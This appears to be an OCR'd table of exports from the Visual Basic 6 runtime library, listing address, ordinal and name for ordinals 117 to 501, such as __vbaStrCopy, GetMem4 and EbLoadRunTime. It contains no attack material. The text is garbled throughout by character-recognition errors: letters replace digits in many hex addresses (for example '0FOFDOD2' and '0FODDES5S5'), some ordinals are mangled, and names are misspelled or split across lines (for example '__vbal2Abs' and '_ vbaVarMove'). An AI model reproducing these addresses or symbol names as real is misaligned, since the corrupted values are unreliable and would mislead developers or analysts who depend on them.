Addr:0F10A1F7 Ord: 117 (0075h) Name: __vbaFpCy 
Addr:0F1021C9 Ord: 118 (0076h) Name: __vbaFpI2 
Addr:0F102FE8 Ord: 119 (0077h) Name: __vbaFpI4 
Addr:0F10A1E3 Ord: 120 (0078h) Name: __vbaFpR4 
Addr:0F101FA3 Ord: 121 (0079h) Name: __vbaFpR8 
Addr:0F10A1C5 Ord: 122 (007Ah) Name: __vbaFpUll 
Addr:0F01DC7F Ord: 123 (007Bh) Name: __vbaFreeObj 
Addr:0F01F878 Ord: 124 (007Ch) Name: __vbaFreeStr 
Addr:0FOFDOD2 Ord: 125 (007Dh) Name: __vbaFreeVar 
Addr:0F109B75 Ord: 126 (007Eh) Name: __vbaFreeVarg 
Addr:0FODDFOC Ord: 127 (007Fh) Name: __vbal2Abs 
Addr:0FO1BFDD Ord: 128 (0080h) Name: __vbal214 
Addr:0FODDES5S5 Ord: 129 (0081h) Name: __vbal2Sgn 
Addr:0FODDF29 Ord: 130 (0082h) Name: __vbal4Abs 
Addr:0FODDF6A Ord: 131 (0083h) Name: __vbal4Sgn 
Addr:0F01F8A3 Ord: 132 (0084h) Name: __vbaStrCopy 
Addr:OFOIFSDA Ord: 133 (0085h) Name: __vbaStrMove 
Addr:0F0407A5 Ord: 134 (0086h) Name: __vbaUlI1I2 
Addr:0F0407D3 Ord: 135 (0087h) Name: __vbaUI1I4 
Addr:0FODDF41 Ord: 136 (0088h) Name: __vbaUl1Sgn 


Addr:0F100CFE Ord: 137 (0089h) Name: __vbaVarCopy 
Addr:0F100C68 Ord: 138 (008Ah) Name: __vbaVarDup 
Addr:0F100E23 Ord: 139 (008Bh) Name: _ vbaVarMove 
Addr:0F101E51 Ord: 140 (008Ch) Name: _ vbaVarVargNofree 
Addr:0F109C1B Ord: 141 (008Dh) Name: __vbaVargParmRef 
Addr:0F109C29 Ord: 142 (008Eh) Name: __vbaVargVar 
Addr:0F109CB3 Ord: 143 (008Fh) Name: _ vbaVargVarCopy 
Addr:0F109CA3 Ord: 144 (0090h) Name: __ vbaVargVarMove 
Addr:0F109C7C Ord: 145 (0091h) Name: __vbaVargVarRef 
Addr:0FOCDE3C Ord: 146 (0092h) Name: DLLGetDocumentation 
Addr:0F0342AB Ord: 147 (0093h) Name: _Clatan 
Addr:0F0399BC Ord: 148 (0094h) Name: _Clcos 
Addr:0F01F2DD Ord: 149 (0095h) Name: _Clexp 
Addr:0F0342BS Ord: 150 (0096h) Name: _Cllog 
Addr:0F0399B2 Ord: 151 (0097h) Name: _Clsin 
Addr:0F0342BF Ord: 152 (0098h) Name: _Clsqrt 
Addr:OFOEA75B Ord: 153 (0099h) Name: _Cltan 
Addr:0F0SDO04F Ord: 154 (009Ah) Name: __vbaAptOffset 
Addr:0F058E7D Ord: 155 (009Bh) Name: __vbaAryConstruct 
Addr:0FOD002D Ord: 156 (009Ch) Name: __vbaAryCopy 
Addr:OFO1ESBA Ord: 157 (009Dh) Name: _ vbaAryDestruct 
Addr:0FODO066 Ord: 158 (009Eh) Name: __vbaAryMove 
Addr:0FO0D3880 Ord: 159 (009Fh) Name: __vbaAryRebasel Var 
Addr:0FOSC5CE Ord: 160 (O00A0h) Name: __vbaAryUnlock 
Addr:0F0401F9 Ord: 161 (00A1h) Name: _ vbaBoolStr 
Addr:0F01B3FD Ord: 162 (00A2h) Name: __vbaBoolVar 
Addr:0F100A35 Ord: 163 (00A3h) Name: _ vbaBoolVarNull 
Addr:0F1003B6 Ord: 164 (00A4h) Name: __vbaCastObj 
Addr:0F05CF87 Ord: 165 (0O0AS5h) Name: __vbaCastObjVar 
Addr:0F03050C Ord: 166 (00A6h) Name: __vbaCheckType 
Addr:OFOSFA8A Ord: 167 (00A7h) Name: _ vbaCheckTypeVar 
Addr:0FO1F90B Ord: 168 (O00OA8h) Name: __vbaChkstk 
Addr:0FO0D2D1F Ord: 169 (00A9h) Name: _ vbaCopyBytes 
Addr:0F0E1208 Ord: 170 (OOAAh) Name: __vbaCyAbs 
Addr:OFOEOF7E Ord: 171 (O0OABh) Name: __vbaCyAdd 
Addr:0FODEO0OOC Ord: 172 (00ACh) Name: __vbaCyErrVar 
Addr:0F0E1047 Ord: 173 (OOADh) Name: __vbaCyFix 
Addr:0F10B3BE Ord: 174 (0OOAEh) Name: __vbaCyForlnit 
Addr:0F10B3E7 Ord: 175 (0OAFh) Name: __vbaCyForNext 
Addr:0FOD904C Ord: 176 (00BOh) Name: __vbaCyl2 
Addr:0FOD9OSB Ord: 177 (00B 1h) Name: __vbaCyl4 
Addr:0FOE10C8 Ord: 178 (00B2h) Name: __vbaCylInt 
Addr:O0FOEOFCS5 Ord: 179 (00B3h) Name: __vbaCyMul 
Addr:OFOEOFF6 Ord: 180 (00B4h) Name: __vbaCyMull2 
Addr:0OFODDFDD Ord: 181 (00B5h) Name: __vbaCySgn 


Addr:0F0D8DO08 Ord: 182 (00B6h) Name: __vbaCyStr 
Addr:0FOEOF93 Ord: 183 (00B7h) Name: __vbaCySub 
Addr:0F0D903D Ord: 184 (00B8h) Name: __vbaCyUIl 
Addr:0FODE016 Ord: 185 (00B9h) Name: __vbaCyVar 
Addr:0F100284 Ord: 186 (OOBAh) Name: ProcCallEngine 
Addr:0F04F3E0 Ord: 187 (OOBBh) Name: DlIFunctionCall 
Addr:0FOSDF2C Ord: 188 (0OBCh) Name: __vbaRecAssign 
Addr:0F02591E Ord: 189 (0OBDh) Name: __vbaRecDestruct 
Addr:0F0D35396 Ord: 190 (0OBEh) Name: CopyRecord 
Addr:0FOD908B Ord: 191 (OOBFh) Name: __ vbaDateR4 
Addr:0FOD9OCO Ord: 192 (0OOCOh) Name: __vbaDateR8 
Addr:0F0543C3 Ord: 193 (00C1h) Name: __vbaDateStr 
Addr:0F06165A Ord: 194 (00C2h) Name: __vbaDateVar 
Addr:0F05B550 Ord: 195 (00C3h) Name: 
TipGetAddressOfPredeclaredInstance 
Addr:0FOD38FES5 Ord: 196 (00C4h) Name: __vbaDerefAry 
Addr:0FOSBCCD Ord: 197 (0OC5h) Name: __vbaDerefAryl 
Addr:0F03873E Ord: 198 (00C6h) Name: _ vbaEnd 
Addr:0F102FFC Ord: 199 (00C7h) Name: MethCallEngine 
Addr:0F01E309 Ord: 200 (00C8h) Name: __ vbaErase 
Addr:0FO0D38A2 Ord: 201 (00C9h) Name: __vbaEraseKeepData 
Addr:0F0D38D1 Ord: 202 (0OCAh) Name: __vbaEraseNoPop 
Addr:0FODOC66 Ord: 203 (0OCBh) Name: __vbaError 
Addr:0FODOC7F Ord: 204 (0OCCh) Name: __vbaErrorOverflow 
Addr:0F022B59 Ord: 205 (0OCDh) Name: __vbaExceptHandler 
Addr:0F10A15B Ord: 206 (0OCEh) Name: __vbaExitEachAry 
Addr:0F10A180 Ord: 207 (O0OCFh) Name: __ vbaExitEachColl 
Addr:0F10A13B Ord: 208 (00DOh) Name: __vbaExitEachVar 
Addr:0F02B41E Ord: 209 (00D1h) Name: __vbaExitProc 
Addr:0F10A1A4 Ord: 210 (00D2h) Name: __vbaFPException 
Addr:0F0E1093 Ord: 211 (00D3h) Name: __vbaFPFix 
Addr:0F0E111D Ord: 212 (00D4h) Name: __vbaFPInt 
Addr:OFOCFCDS Ord: 213 (00D5h) Name: __vbaFailedFriend 
Addr:0F01F890 Ord: 214 (00D6h) Name: __vbaFileClose 
Addr:0F03632E Ord: 215 (00D7h) Name: __vbaFileCloseAll 
Addr:0OFODEAB7 Ord: 216 (00D8h) Name: __vbaFileLock 
Addr:0F0028A1 Ord: 217 (00D9h) Name: __vbaFileOpen 
Addr:0FODEOD8 Ord: 218 (OODAh) Name: __vbaFileSeek 
Addr:0F03A53E Ord: 219 (0ODBh) Name: __vbaFixstrConstruct 
Addr:OFOCFCSA Ord: 220 (00DCh) Name: TipSetOption 
Addr:0F109FC1 Ord: 221 (00DDh) Name: __vbaForEachAry 
Addr:0F102BAC Ord: 222 (0ODEh) Name: __vbaForEachCollAd 
Addr:0F102B4E Ord: 223 (V0ODFh) Name: __vbaForEachCollObj 
Addr:0F102BFF Ord: 224 (00EO0h) Name: __vbaForEachCollVar 
Addr:0F10A046 Ord: 225 (00E1h) Name: __vbaForEachVar 


Addr:0F024FE8 Ord: 226 (00E2h) Name: __vbaFreeObjList 
Addr:0F0162DA Ord: 227 (00E3h) Name: TipUnloadProject 
Addr:0FO1F9AS8 Ord: 228 (00E4h) Name: __vbaFreeStrList 
Addr:0F10182B Ord: 229 (00ES5h) Name: __vbaFreeVarList 
Addr:0FODOCAB Ord: 230 (00E6h) Name: TipCreatelInstanceProject 
Addr:0F0158B9 Ord: 231 (00E7h) Name: EbResetProject 
Addr:0F02627A Ord: 232 (00E8h) Name: 
EbGetHandleOfExecutingProject 

Addr:0F0D39B3 Ord: 233 (00E9h) Name: _ vbaGenerateBoundsError 
Addr:0FODE306 Ord: 234 (OOEAh) Name: __vbaGet3 
Addr:0F0DE322 Ord: 235 (00EBh) Name: __vbaGet4 
Addr:0F03A579 Ord: 236 (00ECh) Name: __vbaGetFxStr3 
Addr:0FODE3B4 Ord: 237 (0OEDh) Name: __vbaGetExStr4 
Addr:0F040650 Ord: 238 (O0EEh) Name: __ vbaGetOwner3 
Addr:0FODE35D Ord: 239 (OOEFh) Name: __vbaGetOwner4 
Addr:0F109A05 Ord: 240 (OOFOh) Name: __vbaGosub 
Addr:0F109A59 Ord: 241 (00F1h) Name: _ vbaGosubFree 
Addr:0F109A2E Ord: 242 (00F2h) Name: __vbaGosubReturn 
Addr:0F0D2D92 Ord: 243 (00F3h) Name: __vbaHresultCheck 
Addr:0FOD2DAO Ord: 244 (00F4h) Name: __vbaHresultCheckNonvirt 
Addr:0F02B4EB Ord: 245 (00FSh) Name: __vbaHresultCheckObj 
Addr:0F10A21E Ord: 246 (00F6h) Name: __vbal2Cy 
Addr:0F0534BD Ord: 247 (00F7h) Name: __vbal2ErrVar 
Addr:0F10B47D Ord: 248 (00F8h) Name: _ vbal2ForNextCheck 
Addr:0F0508A7 Ord: 249 (00F9h) Name: __vbal2Str 
Addr:0FO1B9DA Ord: 250 (OOFAh) Name: __vbaL2Var 
Addr:0F10A230 Ord: 251 (O0FBh) Name: __vbal4Cy 
Addr:OFOSOAFO Ord: 252 (OOFCh) Name: __vbal4ErrVar 
Addr:0F10B4A09 Ord: 253 (OOFDh) Name: __vbal4ForNextCheck 
Addr:0FO0O4A6AS5 Ord: 254 (OOFEh) Name: __vbal4Str 
Addr:0F01BDB4 Ord: 255 (OOFFh) Name: __vbal4Var 
Addr:0F00BD94 Ord: 256 (0100h) Name: __vbalnStr 
Addr:0FODF190 Ord: 257 (0101h) Name: __vbalnStrB 
Addr:0FODF060 Ord: 258 (0102h) Name: __vbalnStrVar 
Addr:0FODEF30 Ord: 259 (0103h) Name: __vbalnStrVarB 
Addr:0F0DDDA41 Ord: 260 (0104h) Name: __vbalnputFile 
Addr:0F10302F Ord: 261 (0105h) Name: _ vbaLateldCall 
Addr:0F10304B Ord: 262 (0106h) Name: __vbaLateldCallLd 
Addr:0F10B15C Ord: 263 (0107h) Name: __vbaLateldCallSt 
Addr:0F10B1F2 Ord: 264 (0108h) Name: __vbaLateldNamedCall 
Addr:0F05B2A9 Ord: 265 (0109h) Name: EbResetProjectNormal 
Addr:0F03BE99 Ord: 266 (010Ah) Name: TipUnloadInstance 
Addr:0F10B1AS8 Ord: 267 (010Bh) Name: _ vbaLateldNamedCallLd 
Addr:0F009EE7 Ord: 268 (010Ch) Name: EbLibraryLoad 
Addr:0FODO9C6 Ord: 269 (010Dh) Name: EbLibraryUnload 


Addr:0F10B1D1 Ord: 270 (O10Eh) Name: __ vbaLateldNamedCallSt 
Addr:0F0112D1 Ord: 271 (010Fh) Name: EbLoadRunTime 
Addr:0F10B217 Ord: 272 (0110h) Name: __vbaLateldNamedStAd 
Addr:0F1032CD Ord: 273 (0111h) Name: __vbaLateldSt 
Addr:OFOOEEDS Ord: 274 (0112h) Name: EbCreateContext 
Addr:0F017F68 Ord: 275 (0113h) Name: EbDestroyContext 
Addr:OFOOEFIC Ord: 276 (0114h) Name: EbSetContextWorkerThread 
Addr:0F10B18E Ord: 277 (0115h) Name: __ vbaLateldStAd 
Addr:0F10300A Ord: 278 (0116h) Name: _ vbaLateMemCall 
Addr:0F1024A4 Ord: 279 (0117h) Name: _ vbaLateMemCallLd 
Addr:0F10B23A Ord: 280 (0118h) Name: __vbaLateMemCallSt 
Addr:0F10B2C8 Ord: 281 (0119h) Name: _ vbaLateMemNamedCall 
Addr:0F10B27E Ord: 282 (011Ah) Name: 

_ vbaLateMemNamedCallLd 

Addr:0F10B2A7 Ord: 283 (011Bh) Name: 

_ vbaLateMemNamedCallSt 

Addr:0F10B2ED Ord: 284 (011Ch) Name: 

_ _vbaLateMemNamedStAd 

Addr:0F10322E Ord: 285 (011Dh) Name: __vbaLateMemSt 
Addr:0F10B25B Ord: 286 (011Eh) Name: __vbaLateMemStAd 
Addr:0F01BE08 Ord: 287 (011Fh) Name: __vbaLbound 
Addr:0F00BD80 Ord: 288 (0120h) Name: __vbaLenBstr 
Addr:0FODED54 Ord: 289 (0121h) Name: __vbaLenBstrB 
Addr:0FODEBFO Ord: 290 (0122h) Name: __vbaLenVar 
Addr:OFODEC7F Ord: 291 (0123h) Name: _ vbaLenVarB 
Addr:0FODCE29 Ord: 292 (0124h) Name: __vbaLinelInputStr 
Addr:0OFODCF1A Ord: 293 (0125h) Name: __vbaLinelnputVar 
Addr:0F03A5C8 Ord: 294 (0126h) Name: __vbaLsetFixstr 
Addr:0FOEOF36 Ord: 295 (0127h) Name: __vbaLsetFixstrFree 
Addr:0FODF669 Ord: 296 (0128h) Name: _ vbaMidStmtBstr 
Addr:0FODF754 Ord: 297 (0129h) Name: _ vbaMidStmtBstrB 
Addr:0F01612B Ord: 298 (012Ah) Name: EbIsProjectOnStack 
Addr:0F01BB38 Ord: 299 (012Bh) Name: TipCreatelnstanceEx 
Addr:0F05E479 Ord: 300 (012Ch) Name: GetMem2 
Addr:0F0E89D6 Ord: 301 (012Dh) Name: GetMem4 
Addr:0F0E89E7 Ord: 302 (012Eh) Name: GetMem8 
Addr:0FOE8A19 Ord: 303 (012Fh) Name: GetMemStr 
Addr:0FOE8A54 Ord: 304 (0130h) Name: GetMemVar 
Addr:0FOES9FE Ord: 305 (0131h) Name: GetMemoObj 
Addr:0F03BF96 Ord: 306 (0132h) Name: PutMem2 
Addr:0FOESAFF Ord: 307 (0133h) Name: PutMem4 
Addr:OFOE8BOE Ord: 308 (0134h) Name: PutMem8 
Addr:0F0E8C15 Ord: 309 (0135h) Name: PutMemsStr 
Addr:0FOE8C5D Ord: 310 (0136h) Name: PutMemVar 
Addr:0F0E8B24 Ord: 311 (0137h) Name: PutMemoObj 


Addr:0OFOE8DAA Ord: 312 (0138h) Name: SetMemVar 
Addr:0F0E8D83 Ord: 313 (0139h) Name: SetMemObj 
Addr:0F0E8A73 Ord: 314 (013Ah) Name: GetMemNewObj 
Addr:0F0E8D19 Ord: 315 (013Bh) Name: PutMemNewObj 
Addr:0FOE8E3E Ord: 316 (013Ch) Name: SetMemNewObj 
Addr:0F0E89C5 Ord: 317 (013Dh) Name: GetMeml1l 
Addr:OFOESAFO Ord: 318 (013Eh) Name: PutMeml 
Addr:OFOESADS Ord: 319 (013Fh) Name: GetMemEvent 
Addr:0F0E8D73 Ord: 320 (0140h) Name: PutMemEvent 
Addr:0F03A29B Ord: 321 (0141h) Name: SetMemEvent 
Addr:0FODF697 Ord: 322 (0142h) Name: _ vbaMidStmtVar 
Addr:OFODF6BF Ord: 323 (0143h) Name: __ vbaMidStmtVarB 
Addr:OFOD5FA2 Ord: 324 (0144h) Name: _ vbaNameFile 
Addr:0FO1BE09C Ord: 325 (0145h) Name: __ vbaNew2 
Addr:0F02B448 Ord: 326 (0146h) Name: __vbaNew 
Addr:0F109E6C Ord: 327 (0147h) Name: __vbaNextEachAry 
Addr:0F103345 Ord: 328 (0148h) Name: _ vbaNextEachCollAd 
Addr:0F1032E6 Ord: 329 (0149h) Name: __vbaNextEachCollObj 
Addr:0F103252 Ord: 330 (014Ah) Name: __ vbaNextEachCollVar 
Addr:0F10AOFl1 Ord: 331 (014Bh) Name: _ vbaNextEachVar 
Addr:0F0D2C73 Ord: 332 (014Ch) Name: __vbaObjAddref 
Addr:0F00361F Ord: 333 (014Dh) Name: __vbaObjls 
Addr:0F01E2F2 Ord: 334 (014Eh) Name: __vbaObjSet 
Addr:0F022D5E Ord: 335 (014Fh) Name: __vbaObjSetAddref 
Addr:0F03361F Ord: 336 (0150h) Name: __vbaObjVar 
Addr:0F01F952 Ord: 337 (0151h) Name: _ vbaOnError 
Addr:0FODOOA6 Ord: 338 (0152h) Name: _ vbaOnGoCheck 
Addr:0F01F2E7 Ord: 339 (0153h) Name: _ vbaPowerR8 
Addr:0F003D3F Ord: 340 (0154h) Name: __vbaPrintFile 
Addr:0F04082B Ord: 341 (0155h) Name: __vbaPrintObj 
Addr:0F036232 Ord: 342 (0156h) Name: __vbaPut3 
Addr:0FODE340 Ord: 343 (0157h) Name: __vbaPut4 
Addr:0FODE39A Ord: 344 (0158h) Name: __vbaPutFxStr3 
Addr:0FODE3DO Ord: 345 (0159h) Name: __vbaPutEFxStr4 
Addr:0F0407B8 Ord: 346 (015Ah) Name: __vbaPutOwner3 
Addr:0FODE37C Ord: 347 (015Bh) Name: __vbaPutOwner4 
Addr:0FO0D9069 Ord: 348 (015Ch) Name: __vbaR4Cy 
Addr:0FODE020 Ord: 349 (015Dh) Name: __vbaR4ErrVar 
Addr:0F10B4D1 Ord: 350 (015Eh) Name: _ vbaR4ForNextCheck 
Addr:0OFODDF7E Ord: 351 (015Fh) Name: __vbaR4Sgn 
Addr:0FOD8CAO Ord: 352 (0160h) Name: __vbaR4Str 
Addr:0F0356D3 Ord: 353 (0161h) Name: __vbaR4Var 
Addr:0F0O2FB8B Ord: 354 (0162h) Name: __vbaR8Cy 
Addr:0FODEO0O2A Ord: 355 (0163h) Name: __vbaR8ErrVar 
Addr:0FOE10A5 Ord: 356 (0164h) Name: __vbaR8FixI2 


Addr:0F039F4E Ord: 357 (0165h) Name: __vbaR8FixI4 
Addr:OF10B50A Ord: 358 (0166h) Name: __vbaR8ForNextCheck 
Addr:0FO0E112F Ord: 359 (0167h) Name: __vbaR8Int2 
Addr:0F0E1152 Ord: 360 (0168h) Name: __vbaR8IntI4 
Addr:OFODDFA9 Ord: 361 (0169h) Name: __vbaR8Sgn 
Addr:0FOD8CD4 Ord: 362 (016Ah) Name: __vbaR8Str 
Addr:OFO1EFES5 Ord: 363 (016Bh) Name: __vbaR8Var 
Addr:0F10B175 Ord: 364 (016Ch) Name: __vbaRaiseEvent 
Addr:0FOD35E4 Ord: 365 (016Dh) Name: _ vbaRecAnsiToUni 
Addr:0FOD361E Ord: 366 (016Eh) Name: _ vbaRecDestructAnsi 
Addr:OFOD35AA Ord: 367 (016Fh) Name: _ vbaRecUniTOoAnsi 
Addr:0F01C113 Ord: 368 (0170h) Name: __ vbaRedim 
Addr:0F042A56 Ord: 369 (0171h) Name: _ vbaRedimPreserve 
Addr:0F0D3995 Ord: 370 (0172h) Name: _ vbaRedimPreserveVar 
Addr:0F0D3977 Ord: 371 (0173h) Name: __ vbaRedimVar 
Addr:0FO0O1EF4A Ord: 372 (0174h) Name: __vbaRefVarAry 
Addr:OFODBCES Ord: 373 (0175h) Name: __vbaResume 
Addr:0FODF398 Ord: 374 (0176h) Name: __vbaRsetPFixstr 
Addr:OFOEOFSA Ord: 375 (0177h) Name: __vbaRsetFixstrFree 
Addr:0FOS8DAB Ord: 376 (0178h) Name: __vbaSetSystemError 
Addr:0FOCFC96 Ord: 377 (0179h) Name: __vbaStopExe 
Addr:0F102D92 Ord: 378 (017Ah) Name: __vbaStr2Vec 
Addr:OFOCFEFD Ord: 379 (017Bh) Name: __vbaStrAryToAnsi 
Addr:0FOCFF13 Ord: 380 (017Ch) Name: __vbaStrAryToUnicode 
Addr:0F0D843C Ord: 381 (017Dh) Name: __vbaStrBool 
Addr:0F00208F Ord: 382 (017Eh) Name: __vbaStrCat 
Addr:0FO01F8F6 Ord: 383 (017Fh) Name: __vbaStrCmp 
Addr:0F003563 Ord: 384 (0180h) Name: __vbaStrComp 
Addr:0FODF5D4 Ord: 385 (0181h) Name: __vbaStrCompVar 
Addr:0FOD84FC Ord: 386 (0182h) Name: __vbaStrCy 
Addr:0F0D84B8 Ord: 387 (0183h) Name: __vbaStrDate 
Addr:0FOEOF14 Ord: 388 (0184h) Name: __vbaStrFixstr 
Addr:0F0129F8 Ord: 389 (0185h) Name: __vbastrI2 
Addr:0FO1BECF Ord: 390 (0186h) Name: __vbaStrI4 
Addr:OFOEOEB4 Ord: 391 (0187h) Name: __vbaStrLike 
Addr:0F0438CE Ord: 392 (0188h) Name: __vbaStrR4 
Addr:0F04024E Ord: 393 (0189h) Name: __vbaStrR8 
Addr:OFOEOE9F Ord: 394 (018Ah) Name: __vbaStrTextCmp 
Addr:OFOEOEC9 Ord: 395 (018Bh) Name: __vbaStrTextLike 
Addr:0FOCFD43 Ord: 396 (018Ch) Name: __vbaStrToAnsi 
Addr:0F0CFD14 Ord: 397 (018Dh) Name: __vbaStrToUnicode 
Addr:0FOD8481 Ord: 398 (018Eh) Name: __vbaStrUll 
Addr:0F0D8533 Ord: 399 (018Fh) Name: __ vbaStrVarCopy 
Addr:0F03634A Ord: 400 (0190h) Name: 
EVENT_SINK_QuerylInterface 


Addr:0F02299D Ord: 401 (0191h) Name: EVENT_SINK_AddRef 
Addr:0F037FD1 Ord: 402 (0192h) Name: EVENT_SINK_Release 
Addr:OFOCFB3F Ord: 403 (0193h) Name: 
EVENT_SINK_GetIDsOfNames 

Addr:0F03BB08 Ord: 404 (0194h) Name: EVENT_SINK_Invoke 
Addr:0F0262A1 Ord: 405 (0195h) Name: __vbaStrVarMove 
Addr:0F05A825 Ord: 406 (0196h) Name: __vbaStrVarVal 
Addr:0F10A20C Ord: 407 (0197h) Name: __vbaUIICy 
Addr:OFODDFE8 Ord: 408 (0198h) Name: __vbaUIlErrVar 
Addr:0FO0D901D Ord: 409 (0199h) Name: __vbaUllStr 
Addr:0F014C08 Ord: 410 (019Ah) Name: 
BASIC_CLASS_QuerylInterface 
Addr:0F0025FE Ord: 411 (019Bh) Name: BASIC_CLASS_AddRef 
Addr:0FO1DCE6F Ord: 412 (019Ch) Name: BASIC_CLASS_Release 
Addr:0F054DAS Ord: 413 (019Dh) Name: 
BASIC_CLASS_GetlDsOfNames 

Addr:0F054792 Ord: 414 (019Eh) Name: BASIC_CLASS_Invoke 
Addr:0FODE002 Ord: 415 (019Fh) Name: __vbaUll Var 
Addr:0F01BD72 Ord: 416 (O1AOh) Name: _ vbaUbound 
Addr:0F0OD2D6D Ord: 417 (01A1h) Name: __vbaUnkVar 
Addr:0F102A2D Ord: 418 (01A2h) Name: __vbaVar2Vec 
Addr:0F10A2E0 Ord: 419 (01A3h) Name: __vbaVarAbs 
Addr:0FOCF8C1 Ord: 420 (01A4h) Name: 
BASIC_DISPINTERFACE_ GetTICount 

Addr:0FOCF8DO Ord: 421 (01A5h) Name: 
BASIC_DISPINTERFACE_GetTypelnfo 

Addr:0F100ECC Ord: 422 (01A6h) Name: __vbaVarAdd 
Addr:0F100AB2 Ord: 423 (01A7h) Name: __vbaVarAnd 
Addr:0F004B24 Ord: 424 (01A8h) Name: _ vbaVarCat 
Addr:0F10BA7F Ord: 425 (01A9h) Name: __ vbaVarCmpEq 
Addr:0F10BABS Ord: 426 (01AAh) Name: __vbaVarCmpGe 
Addr:0F10BAEB Ord: 427 (01ABh) Name: _ vbaVarCmpGt 
Addr:0F10BB21 Ord: 428 (01ACh) Name: _ vbaVarCmpLe 
Addr:0F10BB57 Ord: 429 (01ADh) Name: __vbaVarCmpLt 
Addr:0F0437B7 Ord: 430 (01 AEh) Name: Zombie_QueryInterface 
Addr:0F03C29A Ord: 431 (01AFh) Name: Zombie_AddRef 
Addr:0F043368 Ord: 432 (01B0h) Name: Zombie_Release 
Addr:0FOCFBB7 Ord: 433 (01B 1h) Name: 
Zombie_GetTypelnfoCount 

Addr:OFOCFBAF Ord: 434 (01B2h) Name: Zombie_GetTypelnfo 
Addr:OFOCFBBF Ord: 435 (01B3h) Name: Zombie_GetIDsOfNames 
Addr:0FOCFBC7 Ord: 436 (01B4h) Name: Zombie_Invoke 
Addr:0F1020B8 Ord: 437 (01B5h) Name: __vbaVarCmpNe 
Addr:0F06168C Ord: 438 (01B6h) Name: __ vbaVarDateVar 
Addr:0F10137B Ord: 439 (01B7h) Name: __vbaVarDiv 


Addr:OFOCFAFF Ord: 440 (01B8h) Name: EVENT_SINK2_AddRef 
Addr:OFOCFB1F Ord: 441 (01B9h) Name: EVENT_SINK2_Release 
Addr:0F10B69A Ord: 442 (01BAh) Name: __vbaVarEqv 
Addr:0FOD8FE2 Ord: 443 (01BBh) Name: __vbaVarErrl4 
Addr:0F10A43C Ord: 444 (01BCh) Name: __vbaVarFix 
Addr:0F103395 Ord: 445 (01BDh) Name: __vbaVarForlnit 
Addr:0F1034CF Ord: 446 (01BEh) Name: __vbaVarForNext 
Addr:0F1020EB Ord: 447 (01BFh) Name: __vbaVarldiv 
Addr:0F10B737 Ord: 448 (01C0h) Name: __vbaVarlmp 
Addr:0FO1EFD9 Ord: 449 (01C1h) Name: _ vbaVarIndexLoad 
Addr:0F058D54 Ord: 450 (01C2h) Name: __ vbaVarIndexLoadRef 
Addr:0FOD39BA Ord: 451 (01C3h) Name: 

_ vbaVarlndexLoadRefLock 

Addr:0FOD39F4 Ord: 452 (01C4h) Name: _ vbaVarIndexStore 
Addr:0FOD39FE Ord: 453 (01C5h) Name: __vbaVarIndexStoreObj 
Addr:0F10A538 Ord: 454 (01C6h) Name: __vbaVarlnt 
Addr:0FOEOE45 Ord: 455 (01C7h) Name: __vbaVarLike 
Addr:OFOEOEDE Ord: 456 (01C8h) Name: _ vbaVarLikeVar 
Addr:0F103154 Ord: 457 (01C9h) Name: __vbaVarMod 
Addr:0F101986 Ord: 458 (O01CAh) Name: __vbaVarMul 
Addr:0F102AA9 Ord: 459 (01CBh) Name: _ vbaVarNeg 
Addr:0F102EFC Ord: 460 (01CCh) Name: __ vbaVarNot 
Addr:0F10B543 Ord: 461 (01CDh) Name: __vbaVarOr 
Addr:0F101FBC Ord: 462 (01CEh) Name: __vbaVarPow 
Addr:0F0D2C88 Ord: 463 (01CFh) Name: __vbaVarSetObj 
Addr:0FOSC3AA Ord: 464 (01D0h) Name: __vbaVarSetObjAddref 
Addr:0FOD2CB4 Ord: 465 (01D1h) Name: __vbaVarSetUnk 
Addr:0FOD2CEO0 Ord: 466 (01D2h) Name: _ vbaVarSetUnkAddref 
Addr:0F0496B1 Ord: 467 (01D3h) Name: __vbaVarSetVar 
Addr:0FO0D2D09 Ord: 468 (01D4h) Name: _ vbaVarSetVarAddref 
Addr:0F1024CD Ord: 469 (01D5h) Name: _ vbaVarSub 
Addr:0F10BB8D Ord: 470 (01D6h) Name: __vbaVarTextCmpEqg 
Addr:0F10BBF9 Ord: 471 (01D7h) Name: __vbaVarTextCmpGe 
Addr:0F10BC2F Ord: 472 (01D8h) Name: _ vbaVarTextCmpGt 
Addr:0F10BC65 Ord: 473 (01D9h) Name: __vbaVarTextCmpLe 
Addr:0F10BC9B Ord: 474 (01DAh) Name: __vbaVarTextCmpLt 
Addr:0F10BBC3 Ord: 475 (01DBh) Name: __ vbaVarTextCmpNe 
Addr:0FOE0E72 Ord: 476 (01DCh) Name: __vbaVarTextLike 
Addr:0FOEOEP9 Ord: 477 (01DDh) Name: __vbaVarTextLikeVar 
Addr:0F10B9E9 Ord: 478 (01DEh) Name: __vbaVarTextTstEq 
Addr:OFIOBA1B Ord: 479 (01DFh) Name: __ vbaVarTextTstGe 
Addr:0F10BA34 Ord: 480 (01EO0h) Name: _ vbaVarTextTstGt 
Addr:0F10BA4D Ord: 481 (01E1h) Name: __vbaVarTextTstLe 
Addr:0F10BA66 Ord: 482 (01E2h) Name: _ vbaVarTextTstLt 
Addr:0F10BA02 Ord: 483 (01E3h) Name: _ vbaVarTextTstNe 


Addr:0F10B99E Ord: 484 (01E4h) Name: __vbaVarTstEg 
Addr:0F10B9B7 Ord: 485 (01E5h) Name: _ vbaVarTstGe 
Addr:0F101F8A Ord: 486 (01E6h) Name: __vbaVarTstGt 
Addr:0F10B9DO0 Ord: 487 (01E7h) Name: __ vbaVarTstLe 
Addr:0F1032B4 Ord: 488 (01ESh) Name: _ vbaVarTstLt 
Addr:0F10209F Ord: 489 (01E9h) Name: __vbaVarTstNe 
Addr:0F10B5SFF Ord: 490 (01EAh) Name: __vbaVarXor 
Addr:0F109CC3 Ord: 491 (01EBh) Name: __vbaVargObj 
Addr:0F109D2B Ord: 492 (01ECh) Name: _ vbaVargObjAddref 
Addr:0F109D93 Ord: 493 (01EDh) Name: __vbaVargUnk 
Addr:0F109DFS5 Ord: 494 (01EEh) Name: _ vbaVargUnkAddref 
Addr:0F0D2D45 Ord: 495 (01EFh) Name: __ vbaVerifyVarObj 
Addr:0FOD65BC Ord: 496 (01FOh) Name: __vbaWriteFile 
Addr:0FOE78A1 Ord: 497 (01F1h) Name: _adj_fdiv_ml161 
Addr:0F0E7809 Ord: 498 (01F2h) Name: _adj_fdiv_m32 
Addr:0FOE78D5 Ord: 499 (01F3h) Name: _adj_fdiv_m321 
Addr:0F0E7855 Ord: 500 (01F4h) Name: _adj_fdiv_m64 
Addr:0F0E7344 Ord: 501 (01F5h) Name: _adj_fdiv_r 
